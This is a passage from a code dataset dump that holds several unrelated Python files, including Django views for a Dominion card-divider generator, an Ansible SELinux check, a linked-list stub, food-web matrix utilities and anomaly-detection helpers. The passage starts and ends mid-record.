A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"File views.\n\n$Id: file.py,v 1.7 2004/04/25 16:19:26 srichter Exp $\n\"\"\"\nclass FileView(object):\n\n def show(self):\n \"\"\"Call the File\"\"\"\n request = self.request\n if request is not None:\n request.response.setHeader('Content-Type',\n self.context.contentType)\n request.response.setHeader('Content-Length',\n self.context.getSize())\n\n return self.context.data\n","sub_path":"Zope3/tags/cvs-to-svn-conversion/src/zope/app/file/browser/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"333834281","text":"import re\nimport base64\n\nfrom django.http import HttpResponse, JsonResponse, HttpResponseServerError, HttpResponseBadRequest\nfrom django.shortcuts import render\nfrom django import forms\nimport domdiv.main\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Submit, Layout, Div, HTML\nfrom crispy_forms.bootstrap import FormActions, Accordion, AccordionGroup, AppendedText\nfrom chitboxes.chitboxes import ChitBoxGenerator\nfrom tuckboxes.tuckboxes import TuckBoxGenerator\n\nPAGES = [('domdiv', 'Dominion Dividers'), ('chitboxes', 'Bits Boxes'),\n ('tuckboxes', 'Card Tuckboxes')]\n\nPAPER_SIZES = [u'Letter', u'Legal', u'A4', u'A3']\nTAB_SIDE_SELECTION = {\"left\": \"Left to Right (all tab counts)\",\n \"right\": \"Right to Left (all tab counts)\",\n \"left-alternate\": \"Left then Right (2 tabs)\",\n \"right-alternate\": \"Right then Left (2 tabs))\",\n \"left-flip\":\"Left then flip (2 tabs)\",\n \"right-flip\":\"Right then flip (2 tabs)\",\n \"centre\":\"Centre (1 tab)\",\n \"full\":\"Full width (1 tab)\"}\nTAB_NUMBER_SELECTION = {1: \"1: all in the same location\", 2: \"2: alternating sides\", 3: \"3\", 4: \"4\", 5: \"5\"}\n\nclass TabGenerationOptionsForm(forms.Form):\n def __init__(self, *args, **kwargs):\n super(TabGenerationOptionsForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n Div(Div(HTML('
      Generation Options
      '), css_class='col-md-9'),\n Div(FormActions(\n Submit('submit', 'Generate', style=\"margin-top: 20px;\")),\n css_class='col-md-3'),\n css_class='row'),\n Div(\n Div(\n Accordion(\n AccordionGroup('Expansion Selection', 'expansions',\n 'fan_expansions'),\n AccordionGroup('Page Options', \n 'pagesize',\n HTML(\"Selecting Labels will override some settings to fit the size of the label\"),\n 'no_footer',\n AppendedText('back_offset', 'points', active=True),\n AppendedText('back_offset_height', 'points', active=True)),\n AccordionGroup('Style Options',\n 'orientation', \n 'wrappers', 'notch', \n 'linetype', 'cardsize',\n AppendedText('horizontal_gap', 'cm', active=True),\n AppendedText('vertical_gap', 'cm', active=True)\n ),\n AccordionGroup('Tab Options',\n 'tab_number', 'tab_side', 'serpentine', 'reset_tabs',\n 'tab_name_align', 'set_icon', 'cost_icon', 'black_tabs',\n AppendedText('tabwidth', 'cm', active=True)\n ),\n AccordionGroup('Body Options',\n 'counts', 'types', \n 'divider_front_text', 'divider_back_text',\n 'language'),\n AccordionGroup('Order, Groups and Extras',\n 'order',\n 'group_special', 'base_cards_with_expansion',\n 'upgrade_with_expansion', 'events',\n 'expansion_dividers', \n 'centre_expansion_dividers',\n 'expansion_dividers_long_name'),\n ),\n css_class='col-md-12',\n ),\n 'tag',\n css_class='row',\n ))\n self.helper.form_id = 'id-tabgenoptions'\n self.helper.form_class = 'blueForms'\n self.helper.form_method = 'post'\n self.helper.form_action = '/'\n for field in self.fields.values():\n field.required = False\n choices = ['Horizontal', 'Vertical']\n orientation = forms.ChoiceField(\n choices=list(zip(choices, choices)),\n label='Divider Orientation',\n initial='Horizontal')\n pagesize = forms.ChoiceField(\n choices=list(zip(PAPER_SIZES + domdiv.main.LABEL_KEYS, PAPER_SIZES + domdiv.main.LABEL_SELECTIONS)),\n label='Paper Type',\n initial='Letter')\n choices = ['Sleeved - Thin', 'Sleeved - Thick', 'Unsleeved']\n cardsize = forms.ChoiceField(\n choices=list(zip(choices, choices)),\n label='Card Size',\n initial='Unsleeved')\n tabwidth = forms.FloatField(\n label='Width of Tab in centimeters',\n initial='4.0',\n required=False,\n widget=forms.TextInput())\n back_offset = forms.FloatField(\n label='Back page horizontal offset points to shift to the right',\n initial='0',\n required=False,\n widget=forms.TextInput())\n back_offset_height = forms.FloatField(\n label='Back page vertical offset points to shift upward',\n initial='0',\n required=False,\n widget=forms.TextInput())\n\n horizontal_gap = forms.FloatField(\n label='Horizontal gap between dividers in centimeters',\n initial='0',\n required=False,\n widget=forms.TextInput())\n vertical_gap = forms.FloatField(\n label='Vertical gap between dividers in centimeters',\n initial='0',\n required=False,\n widget=forms.TextInput())\n\n black_tabs = forms.BooleanField(\n label='Black tab background',\n initial=False\n )\n # Expansions\n choices = domdiv.main.EXPANSION_CHOICES\n # make pretty names for the expansion choices\n choiceNames = []\n replacements = {\n '1stedition': '1st Edition',\n '2ndeditionupgrade': '2nd Edition Upgrade',\n '2ndedition': '2nd Edition'\n }\n for choice in choices:\n for s, r in replacements.items():\n if choice.lower().endswith(s):\n choiceNames.append('{} {}'.format(\n choice[:-len(s)].capitalize(), r))\n break\n else:\n choiceNames.append(choice.capitalize())\n expansions = forms.MultipleChoiceField(\n choices=list(zip(choices, choiceNames)),\n label='Expansions to Include (Cmd/Ctrl click 
to select multiple)',\n initial=choices,\n widget=forms.SelectMultiple(attrs={'size': '18'}))\n # Now Fan expansions\n choices = domdiv.main.FAN_CHOICES\n # make pretty names for the expansion choices\n choiceNames = []\n for choice in choices:\n for s, r in replacements.items():\n if choice.lower().endswith(s):\n choiceNames.append('{} {}'.format(\n choice[:-len(s)].capitalize(), r))\n break\n else:\n choiceNames.append(choice.capitalize())\n fan_expansions = forms.MultipleChoiceField(\n choices=list(zip(choices, choiceNames)),\n label='Fan Expansions to Include (Cmd/Ctrl click to select multiple)',\n initial='',\n widget=forms.SelectMultiple(attrs={'size': '3'}))\n base_cards_with_expansion = forms.BooleanField(\n label=\"Include Base cards with the expansion\", initial=False)\n upgrade_with_expansion = forms.BooleanField(\n label=\"Include upgrade cards with the expansion being upgraded\",\n initial=False)\n edition = forms.ChoiceField(\n choices=list(\n zip(domdiv.main.EDITION_CHOICES, domdiv.main.EDITION_CHOICES)),\n label='Edition',\n initial='latest')\n cropmarks = forms.BooleanField(\n label=\"Cropmarks Instead of Outlines\", initial=False)\n linetype = forms.ChoiceField(\n choices=list(\n zip(domdiv.main.LINE_CHOICES,\n domdiv.main.LINE_CHOICES)),\n label='Outline Type',\n initial='line') \n wrappers = forms.BooleanField(\n label=\"Slipcases Instead of Dividers\", initial=False)\n notch = forms.BooleanField(\n label=\"If Slipcases, add a notch in corners\", initial=False)\n serpentine = forms.BooleanField(\n label=\"For 3 or more tabs, tab location reverses when the end is reached instead of resetting to the start\",\n initial=False)\n reset_tabs = forms.BooleanField(\n label=\"Restart tab starting location with every expansion.\", \n initial=True)\n counts = forms.BooleanField(\n label=\"Show number of Cards per Divider\", initial=False)\n types = forms.BooleanField(\n label=\"Show Card Type on each Divider\", initial=False)\n tab_name_align = forms.ChoiceField(\n choices=list(\n zip(domdiv.main.NAME_ALIGN_CHOICES,\n domdiv.main.NAME_ALIGN_CHOICES)))\n tab_number = forms.ChoiceField(\n choices=list(zip(\n [x for x in TAB_NUMBER_SELECTION],\n [TAB_NUMBER_SELECTION[x] for x in TAB_NUMBER_SELECTION])),\n label='Number of tabs',\n initial=1)\n\n for x in domdiv.main.TAB_SIDE_CHOICES:\n if x not in TAB_SIDE_SELECTION:\n TAB_SIDE_SELECTION[x] = x.title()\n tab_side = forms.ChoiceField(\n choices=list(zip(\n [x for x in TAB_SIDE_SELECTION],\n [TAB_SIDE_SELECTION[x] for x in TAB_SIDE_SELECTION])),\n label='Starting tab location',\n initial='left')\n samesidelabels = forms.BooleanField(\n label=\"Same Side Labels\", initial=False)\n order = forms.ChoiceField(\n label=\"Divider Order\",\n choices=list(\n zip(domdiv.main.ORDER_CHOICES, domdiv.main.ORDER_CHOICES)))\n group_special = forms.BooleanField(\n label=\"Group Special Cards (e.g. 
Prizes)\", initial=True)\n expansion_dividers = forms.BooleanField(\n label=\"Include Expansion Dividers\", initial=False)\n centre_expansion_dividers = forms.BooleanField(\n label=\"If Expansion Dividers, centre the tabs on expansion dividers\",\n initial=False)\n expansion_dividers_long_name = forms.BooleanField(\n label=(\"If Expansion Dividers, use edition \"\n \"on expansion dividers names\"),\n initial=False)\n set_icon = forms.ChoiceField(\n choices=list(\n zip(domdiv.main.LOCATION_CHOICES, domdiv.main.LOCATION_CHOICES)),\n label=\"Set Icon Location\",\n initial=\"tab\")\n cost_icon = forms.ChoiceField(\n choices=list(\n zip(domdiv.main.LOCATION_CHOICES, domdiv.main.LOCATION_CHOICES)),\n label=\"Cost Icon Location\",\n initial=\"tab\")\n language = forms.ChoiceField(\n choices=list(\n zip(domdiv.main.LANGUAGE_CHOICES, domdiv.main.LANGUAGE_CHOICES)),\n label='Language',\n initial='en_us')\n events = forms.BooleanField(\n label=\"Exclude Individual Events & Landmarks\", initial=False)\n divider_front_text = forms.ChoiceField(\n label='Front Text',\n choices=list(zip(domdiv.main.TEXT_CHOICES, domdiv.main.TEXT_CHOICES)),\n initial='card')\n divider_back_text = forms.ChoiceField(\n label='Back Text',\n choices=list(\n zip(domdiv.main.TEXT_CHOICES + ['none'],\n domdiv.main.TEXT_CHOICES + ['no back page'])),\n initial='rules')\n no_footer = forms.BooleanField(\n label='Omit the expansion name at the bottom of the page', initial=False)\n tag = forms.CharField(widget=forms.HiddenInput(), initial='domdiv')\n\n\nclass ChitBoxForm(forms.Form):\n def __init__(self, *args, **kwargs):\n super(ChitBoxForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n Div(Div(HTML('
      Generation Options
      '), css_class='col-md-9'),\n Div(FormActions(\n Submit('submit', 'Generate', style=\"margin-top: 20px;\")),\n css_class='col-md-3'),\n css_class='row'),\n Div(\n Div(\n Accordion(\n AccordionGroup('Measurements', 'width', 'length',\n 'height'),\n AccordionGroup('Images', 'main_image', 'side_image')),\n css_class='col-md-12',\n ),\n 'tag',\n css_class='row',\n ))\n self.helper.form_id = 'id-tabgenoptions'\n self.helper.form_class = 'blueForms'\n self.helper.form_method = 'post'\n self.helper.form_action = '/chitboxes/'\n for field in self.fields.values():\n field.required = False\n\n width = forms.FloatField(\n label='Width in cm', min_value=1.0, max_value=20.0, initial=5)\n length = forms.FloatField(\n label='Length in cm', min_value=1.0, max_value=20.0, initial=5)\n height = forms.FloatField(\n label='Height in cm', min_value=1.0, max_value=20.0, initial=2)\n main_image = forms.ImageField(label='Upload Main Image')\n side_image = forms.ImageField(label='Upload Side Image')\n tag = forms.CharField(widget=forms.HiddenInput(), initial='chitboxes')\n\n\nclass TuckBoxForm(forms.Form):\n def __init__(self, *args, **kwargs):\n super(TuckBoxForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n Div(Div(HTML('
      Generation Options
      '), css_class='col-md-9'),\n Div(FormActions(\n Submit('submit', 'Generate', style=\"margin-top: 20px;\")),\n css_class='col-md-3'),\n css_class='row'),\n Div(\n Div(\n Accordion(\n AccordionGroup('Measurements', 'width', 'height',\n 'depth'),\n AccordionGroup('Images', 'front_image', 'side_image',\n 'back_image', 'end_image',\n 'fill_colour', 'preserve_side_aspect',\n 'preserve_end_aspect')),\n css_class='col-md-12',\n ),\n 'tag',\n css_class='row',\n ))\n self.helper.form_id = 'id-tabgenoptions'\n self.helper.form_class = 'blueForms'\n self.helper.form_method = 'post'\n self.helper.form_action = '/tuckboxes/'\n for field in self.fields.values():\n field.required = False\n\n width = forms.FloatField(\n label='Width in cm (1-20)', min_value=1.0, max_value=20.0, initial=6)\n height = forms.FloatField(\n label='Height in cm (1-20)', min_value=1.0, max_value=20.0, initial=9.3)\n depth = forms.FloatField(\n label='Depth in cm (1-20)', min_value=1.0, max_value=20.0, initial=3)\n front_image = forms.ImageField(label='Upload Main Image')\n side_image = forms.ImageField(label='Upload Side Image')\n back_image = forms.ImageField(label='Upload Back Image')\n end_image = forms.ImageField(label='Upload End Image')\n preserve_side_aspect = forms.BooleanField(\n label='Preserve Side Image Aspect', initial=True)\n preserve_end_aspect = forms.BooleanField(\n label='Preserve End Image Aspect', initial=True)\n fill_colour = forms.CharField(\n widget=forms.TextInput(attrs={'type': 'color'}), initial='#99FF99')\n tag = forms.CharField(widget=forms.HiddenInput(), initial='tuckboxes')\n\n\ndef _init_options_from_form_data(post_data):\n form = TabGenerationOptionsForm(post_data)\n if form.is_valid():\n # generate default options\n options = domdiv.main.parse_opts([])\n options = domdiv.main.clean_opts(options)\n data = form.cleaned_data\n options.orientation = data['orientation'].lower()\n # Separate out the various card sizes\n if 'unsleeved' in data['cardsize'].lower():\n options.size = 'unsleeved'\n else:\n options.size = 'sleeved'\n if 'thick' in data['cardsize'].lower():\n options.sleeved_thick = True\n elif 'thin' in data['cardsize'].lower():\n options.sleeved_thin = True\n # due to argparse this should be a list of lists\n options.expansions = [[e] for e in data['expansions']]\n options.fan = [[e] for e in data['fan_expansions']]\n if data['back_offset']:\n options.back_offset = data['back_offset']\n if data['back_offset_height']:\n options.back_offset_height = data['back_offset_height']\n if data['horizontal_gap']:\n options.horizontal_gap = data['horizontal_gap']\n if data['vertical_gap']:\n options.vertical_gap = data['vertical_gap']\n options.black_tabs = data['black_tabs']\n options.upgrade_with_expansion = data['upgrade_with_expansion']\n options.base_cards_with_expansion = data['base_cards_with_expansion']\n options.wrapper = data['wrappers']\n options.notch = data['notch']\n options.cropmarks = data['cropmarks']\n options.linetype = data['linetype']\n options.tab_serpentine = data['serpentine']\n options.expansion_reset_tabs = data['reset_tabs']\n options.count = data['counts']\n options.types = data['types']\n options.tab_name_align = data['tab_name_align']\n options.tab_number = int(data['tab_number'])\n options.tab_side = data['tab_side']\n options.expansion_dividers = data['expansion_dividers']\n options.centre_expansion_dividers = data['centre_expansion_dividers']\n options.expansion_dividers_long_name = data['expansion_dividers_long_name']\n options.cost = data['cost_icon']\n 
options.set_icon = data['set_icon']\n options.order = data['order']\n options.group_special = data['group_special']\n options.language = data['language']\n options.group_global = None # Default to no global groupings of Events, Landmarks, Ways, etc\n options.exclude_events = data['events']\n options.exclude_landmarks = data['events']\n options.text_front = data['divider_front_text']\n options.text_back = data['divider_back_text']\n options.no_page_footer = data['no_footer']\n options.tabwidth = data['tabwidth']\n # Paper or Labels?\n if data['pagesize'] in PAPER_SIZES:\n options.papersize = data['pagesize']\n options.label_name = None\n else:\n options.label_name = data['pagesize']\n options.papersize = 'letter'\n options.wrapper = False\n options.notch = False\n options.cropmarks = False\n options = domdiv.main.clean_opts(options)\n print('options after cleaning:', options)\n return options\n return None\n\n\ndef index(request):\n if request.method == 'POST':\n options = _init_options_from_form_data(request.POST)\n print('options after POST:', options)\n # Create the HttpResponse object with the appropriate PDF headers.\n response = HttpResponse(content_type='application/pdf')\n response[\n 'Content-Disposition'] = 'attachment; filename=\"sumpfork_dominion_tabs.pdf\"'\n options.outfile = response\n domdiv.main.generate(options)\n return response\n else:\n form = TabGenerationOptionsForm()\n\n return render(request, 'dominion_dividers/index.html', {\n 'form': form,\n 'pages': PAGES,\n 'active': 'domdiv'\n })\n\n\ndef preview(request):\n print('preview request: {}'.format(request))\n print('preview post: {}'.format(request.POST))\n print('preview files: {}'.format(request.FILES))\n if request.POST['tag'] == 'domdiv':\n return domdiv_preview(request)\n elif request.POST['tag'] == 'chitboxes':\n return chitbox_preview(request)\n elif request.POST['tag'] == 'tuckboxes':\n return tuckbox_preview(request)\n else:\n return HttpResponseBadRequest('Unknown tag: {}'.format(\n request.POST['tag']))\n\n\ndef domdiv_preview(request):\n options = _init_options_from_form_data(request.POST)\n preview_img = domdiv.main.generate_sample(options)\n preview_img = base64.b64encode(preview_img).decode('ascii')\n try:\n return JsonResponse({'preview_data': preview_img})\n except Exception as e:\n return HttpResponseServerError('Error generating domdiv preview: ' +\n str(e))\n\n\ndef chitbox_preview(request):\n form = ChitBoxForm(request.POST, request.FILES)\n if form.is_valid():\n data = form.cleaned_data\n generator = ChitBoxGenerator.fromRawData(\n data['width'],\n data['length'],\n data['height'],\n None,\n None,\n None,\n )\n preview_img = generator.generate_sample()\n preview_img = base64.b64encode(preview_img).decode('ascii')\n try:\n return JsonResponse({'preview_data': preview_img})\n except Exception as e:\n return HttpResponseServerError(\n 'Error generating chitbox preview: ' + str(e))\n else:\n return HttpResponseBadRequest(\"invalid form data: {}\".format(\n request.POST))\n\n\ndef tuckbox_preview(request):\n form = TuckBoxForm(request.POST, request.FILES)\n if form.is_valid():\n data = form.cleaned_data\n fc = re.match(r'#(\\w{2})(\\w{2})(\\w{2})', data['fill_colour']).groups()\n fc = tuple(int(p, 16) / 255.0 for p in fc)\n\n c = TuckBoxGenerator.fromRawData(\n data['width'], data['height'], data['depth'],\n fillColour=fc, preserveSideAspect=data['preserve_side_aspect'],\n preserveEndAspect=data['preserve_end_aspect'])\n preview_img = c.generate_sample()\n preview_img = 
base64.b64encode(preview_img).decode('ascii')\n try:\n return JsonResponse({'preview_data': preview_img})\n except Exception as e:\n return HttpResponseServerError(\n 'Error generating tuckbox preview: ' + str(e))\n else:\n return HttpResponseBadRequest(\"invalid form data: {}\".format(\n request.POST))\n\n\ndef chitboxes(request):\n if request.method == 'POST':\n form = ChitBoxForm(request.POST, request.FILES)\n if form.is_valid():\n data = form.cleaned_data\n # Create the HttpResponse object with the appropriate PDF headers.\n response = HttpResponse(content_type='application/pdf')\n response[\n 'Content-Disposition'] = 'attachment; filename=\"sumpfork_chitbox.pdf\"'\n c = ChitBoxGenerator.fromRawData(\n data['width'], data['length'], data['height'], response,\n data['main_image'], data['side_image'])\n c.generate()\n\n return response\n else:\n form = ChitBoxForm()\n return render(request, 'dominion_dividers/index.html', {\n 'form': form,\n 'pages': PAGES,\n 'active': 'chitboxes'\n })\n\n\ndef tuckboxes(request):\n if request.method == 'POST':\n form = TuckBoxForm(request.POST, request.FILES)\n if form.is_valid():\n data = form.cleaned_data\n # Create the HttpResponse object with the appropriate PDF headers.\n response = HttpResponse(content_type='application/pdf')\n response[\n 'Content-Disposition'] = 'attachment; filename=\"sumpfork_chitbox.pdf\"'\n fc = re.match(r'#(\\w{2})(\\w{2})(\\w{2})',\n data['fill_colour']).groups()\n fc = tuple(int(p, 16) / 255.0 for p in fc)\n c = TuckBoxGenerator.fromRawData(\n data['width'], data['height'], data['depth'], response,\n data['front_image'], data['side_image'], data['back_image'],\n data['end_image'], fc, data['preserve_side_aspect'],\n data['preserve_end_aspect'])\n c.generate()\n c.close()\n return response\n else:\n form = TuckBoxForm()\n return render(request, 'dominion_dividers/index.html', {\n 'form': form,\n 'pages': PAGES,\n 'active': 'tuckboxes'\n })\n","sub_path":"bgtools/dominion_dividers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"593741621","text":"from ansible.module_utils.basic import AnsibleModule\nimport sys\n\nclass SelinuxCheck:\n def __init__(self, ansible_selinux):\n self.ansible_selinux = ansible_selinux\n\n def selinux_set_correctly(self):\n selinux_status = self.ansible_selinux['status']\n\n if selinux_status == 'disabled':\n return True\n if selinux_status == 'enabled':\n selinux_mode = self.ansible_selinux['mode']\n if selinux_mode == 'permissive':\n return True\n\n return False\n\n def get_attribute(self, attribute):\n return self.ansible_selinux[attribute]\n\ndef main():\n argument_spec = dict(\n ansible_selinux=dict(required=True, type='dict')\n )\n\n module = AnsibleModule(argument_spec=argument_spec,\n check_invalid_arguments=True,\n supports_check_mode=True)\n\n ansible_selinux = module.params['ansible_selinux']\n\n check = SelinuxCheck(ansible_selinux)\n check_result = check.selinux_set_correctly()\n\n if check_result:\n message = \"Passed\"\n module.exit_json(failed=False, msg=message)\n else:\n message = \"The pre-deployment validation has determined that SELinux is not set as expected. 
See the \\\"Configure SELinux\\\" topic in SAS Viya on Linux: Deployment Guide for information about deploying with SELinux.\"\n module.fail_json(msg=message)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"library/selinux_check.py","file_name":"selinux_check.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"202650080","text":"from typing import Any\n\nfrom node import Node\n\n\nclass LinkedList:\n def __init__(self):\n self.__head = None\n self.__tail = None\n self.__len = 0\n\n def __len__(self):\n return self.__len\n\n def insert(self, index, value):\n insert_node = Node(value)\n if not self.__len: # пустой список\n self.__head = insert_node\n self.__tail = self.__head\n elif index >= self.__len: # вставка вне границ\n insert_node.prev = self.__tail\n self.__tail.next = insert_node\n self.__tail = insert_node\n\n self.__len += 1\n\n def append(self, value: Any) -> None:\n \"\"\"\n Append Node to tail of LinkedList\n\n :param value:\n :return: None\n \"\"\"\n append_node = Node(value)\n if not self.__len: # пустой список\n self.__head = append_node\n self.__tail = self.__head\n else:\n append_node.prev = self.__tail\n self.__tail.next = append_node\n self.__tail = append_node\n\n self.__len += 1\n\n def __iter__(self):\n current_node = self.__head\n for _ in range(self.__len):\n yield current_node.value\n current_node = current_node.next\n\n def clear(self):\n current_node = self.__head\n for _ in range(self.__len):\n next_node = current_node.next\n del(current_node)\n current_node = next_node\n self.__len = 0\n\n def test_memory(self):\n self.append(5)\n self.clear()\n print(self.__head)\n print(self.__tail)\n\n def find(self, value):\n for index, linked_list_value in self:\n if value == linked_list_value:\n return index\n\n\n def remove(self, value):\n ...\n\n def delete(self, index):\n ...\n\n\nif __name__ == '__main__':\n l = LinkedList()\n l.test_memory()\n # l.append(1)\n # l.append(2)\n #\n # for value in l:\n # print(value)\n\n","sub_path":"linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"349185382","text":"import os\nimport sys\n\ntry:\n x = 0\n caminho = os.path.abspath(f'{sys.argv[1]}')\n reverse = []\n with open(caminho, \"r\", encoding=\"utf8\") as file:\n for line in reversed(list(file)):\n line = line.strip()\n reverse.append(line)\n x+=1\n if x>9:\n break\n print(reverse) \n\nexcept FileNotFoundError:\n print(\"Não foi possivel encontrar o arquivo!\")\n\n","sub_path":"Lista 9/teste3.py","file_name":"teste3.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"502715306","text":"import scipy as sp\nimport numpy as np\n\ndef adjacency(W):\n \"\"\"\n Return the adjacency matrix\n \"\"\"\n adj = np.copy(W)\n adj[adj>0] = 1\n return adj\n\n\ndef websize(W):\n \"\"\"\n Return the size of a matrix\n \"\"\"\n return np.prod(np.shape(W))\n\n\ndef connectance(W):\n \"\"\"\n Return the connectance as L/S^2\n \"\"\"\n ad = adjacency(W)\n ws = websize(W)\n return float(np.sum(ad))/ws\n\n\ndef generality(W):\n ad = adjacency(W)\n gen = np.sum(ad,axis=1)\n return gen\n\n\ndef vulnerability(W):\n ad = adjacency(W)\n gen = np.sum(ad,axis=0)\n return gen\n\n\ndef rank(V):\n # Returns the rank of a vector\n # with no ties\n rn = 
np.zeros(len(V),dtype=np.int32)\n crnk = 0\n while crnk < len(V):\n for j in xrange(0,len(V)):\n cMax = np.max(V)\n if V[j] == cMax:\n rn[j] = crnk\n crnk += 1\n V[j] = np.min(V)-1\n break\n return rn\n\n\ndef sortbydegree(W):\n # Sort a matrix by degree\n # Better for visualization\n # Required for nestednes\n if hasattr(W,'connectance'):\n g = W.generality\n v = W.vulnerability\n upsp = W.upsp\n losp = W.losp\n web = W.web\n ## VOID VECTORS FOR THE SORTED SPECIES NAMES\n oTnames = W.upnames\n oBnames = W.lonames\n vTnames = np.copy(oTnames)\n vBnames = np.copy(oBnames)\n else:\n g = generality(W)\n v = vulnerability(W)\n upsp = len(W)\n losp = len(W[0])\n web = W\n ## Step 1 : sort TLO\n rG = rank(g)\n nW = np.zeros((upsp,losp))\n for ro in range(0,upsp):\n nW[rG[ro]] = web[ro]\n if hasattr(W,'connectance'):\n vTnames[rG[ro]] = oTnames[ro]\n ## Step 2 : sort BLO\n nW = nW.T\n dW = np.zeros((upsp,losp)).T\n rG = rank(v)\n for ro in range(0,losp):\n dW[rG[ro]] = nW[ro]\n if hasattr(W,'connectance'):\n vBnames[rG[ro]] = oBnames[ro]\n Fweb = np.copy(dW.T)\n # This is an horrible horrible solution\n if hasattr(W,'connectance'):\n Fweb = [Fweb,vTnames,vBnames]\n return Fweb\n\n\ndef fixmat(aW):\n import numpy as np\n W = np.copy(aW)\n # Fix a matrix so that there are no empty row\n # or empty columns, issues a message is some rows\n # were removed\n OrigSize = websize(W)\n g = generality(W)\n v = vulnerability(W)\n emptyRows = 0\n emptyCols = 0\n for i in range(len(g)):\n if g[i]==0:\n emptyRows += 1\n for j in range(len(v)):\n if v[j]==0:\n emptyCols += 1\n if (emptyRows+emptyCols)==0:\n return W\n else :\n # Create a new matrix with the correct dimensions\n nW = np.zeros(((len(W)-emptyRows),(len(W[0])-emptyCols)),float)\n # For each row and each column\n # copy the correct values in the new matrix\n cRow = 0\n for i in range(len(g)):\n # If the species i is not interacting, we can skip\n if g[i] == 0:\n continue\n else:\n cCol = 0\n # Else we go throug the species j\n for j in range(len(v)):\n if v[j] > 0:\n nW[cRow][cCol] = W[i][j]\n cCol += 1\n cRow += 1\n # Finally...\n return nW\n\n\ndef readweb(fname):\n # Read a web from a text matrix with top trophic level organisms as rows\n data = np.loadtxt(fname)\n return fixmat(data)\n\n","sub_path":"python/biweb/base/descriptions.py","file_name":"descriptions.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"568980222","text":"import os\nimport torch\nimport logging\nimport numpy as np\nimport pandas as pd\n\nfrom typing import Sequence, Tuple, Dict, Optional\nfrom bagel.data import KPI\nfrom bagel.evaluation import adjust_scores, ignore_missing, best_f1score\n\n\nclass KPIStats:\n\n def __init__(self, kpi: KPI):\n self.num_points = len(kpi.values)\n self.num_missing = len(kpi.missing[kpi.missing == 1])\n self.num_anomaly = len(kpi.labels[kpi.labels == 1])\n self.missing_rate = self.num_missing / self.num_points\n self.anomaly_rate = self.num_anomaly / self.num_points\n\n\nclass ProgressLogger:\n\n def __init__(self, n: int):\n self._n = n\n self._current = 1\n\n def log(self, **extra):\n message = ''\n for k, v in extra.items():\n message += f' {k}={v}'\n logging.info(f'[Progress {self._current}/{self._n}]{message}')\n self._current += 1\n\n\ndef set_num_threads(num_threads: int):\n torch.set_num_threads(num_threads)\n\n\ndef mkdirs(*dirs: str):\n for directory in dirs:\n if not os.path.isdir(directory):\n os.makedirs(directory)\n\n\ndef 
list_file(path: str) -> Sequence[str]:\n if os.path.isdir(path):\n return [os.path.join(path, file) for file in os.listdir(path)]\n else:\n return [path]\n\n\ndef get_filename(file: str) -> str:\n return os.path.splitext(os.path.basename(file))[0]\n\n\ndef load_kpi(file: str) -> KPI:\n df = pd.read_csv(file, header=0)\n labels = df.label if 'label' in df.keys() else None\n return KPI(values=df.value, timestamps=df.timestamp, labels=labels, name=get_filename(file))\n\n\ndef get_result(labels: np.ndarray, scores: np.ndarray, missing: np.ndarray) -> Dict[str, float]:\n adjusted_scores = adjust_scores(labels=labels, scores=scores)\n adjusted_labels, adjusted_scores = ignore_missing([labels, adjusted_scores], missing=missing)\n threshold, precision, recall, f1score = best_f1score(labels=adjusted_labels, scores=adjusted_scores)\n return {'threshold': threshold,\n 'precision': precision,\n 'recall': recall,\n 'f1score': f1score}\n\n\ndef get_kpi_stats(*kpis: KPI) -> Tuple[KPIStats, ...]:\n ret = []\n for kpi in kpis:\n ret.append(KPIStats(kpi))\n return tuple(ret)\n\n\ndef log_result(name: str, result: Dict[str, float], size: Optional[int] = None):\n logging.info(f'kpi_name: {name}')\n if size is not None:\n logging.info(f'size: {size}')\n logging.info(f'threshold={result[\"threshold\"]}')\n logging.info(f'precision={result[\"precision\"]:.3f}')\n logging.info(f'recall={result[\"recall\"]:.3f}')\n logging.info(f'f1score={result[\"f1score\"]:.3f}')\n","sub_path":"sample/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"14059267","text":"import time\nimport sys\nimport os.path\nimport grpc\n\nimport pytest\n\n# include directory intergration/rpc for module import\nsys.path.append(\n os.path.abspath(\n os.path.join(os.path.split(__file__)[0], \"../rpc\")\n )\n)\nfrom instance_manager.engine_manager_client import EngineManagerClient # NOQA\nfrom instance_manager.process_manager_client import ProcessManagerClient # NOQA\n\n\nINSTANCE_MANAGER = \"localhost:8500\"\n\nLONGHORN_BINARY = \"./bin/longhorn\"\nUPGRADE_LONGHORN_BINARY = \"/opt/longhorn\"\n\nINSTANCE_MANAGER_TYPE_ENGINE = \"engine\"\nINSTANCE_MANAGER_TYPE_REPLICA = \"replica\"\n\nSIZE = 4 * 1024 * 1024\n\nRETRY_INTERVAL = 1\nRETRY_COUNTS = 30\n\nPROC_STATE_STARTING = 